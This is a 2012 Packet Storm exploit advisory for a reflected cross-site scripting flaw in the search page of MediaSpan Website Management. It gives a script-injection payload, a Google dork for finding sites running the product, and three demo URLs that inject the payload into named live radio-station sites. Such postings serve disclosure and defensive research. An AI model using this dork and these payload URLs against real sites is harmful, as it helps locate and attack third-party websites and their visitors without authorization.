MediaSpan Website Management Cross Site Scripting

2012-08-25T00:00:00
ID PACKETSTORM:115889
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
                                            `###################################################################################  
  
# Exploit Title: MediaSpan Website Management Cross Site Scripting Vulnerability  
#  
# Google Dork: intext:":Copyright © 2012 CUMULUS MEDIA and MediaSpan"  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Vendor Home : http://www.mediaspanonline.com/products/websitemanagement/  
#  
# Tested on: all  
#  
###################################################################################  
  
  
========================================  
there is an xss in searchresults.asp  
go to search page and put this (or any html code) in search form  
<script>alert(1);</script>   
========================================  
D3M0 :   
http://khop.com/searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E  
  
  
http://www.993kjoy.com/searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++  
  
  
http://www.wabcradio.com/searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++  
  
  
===============Crim3R@Att.Net===========  
  
$home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir  
`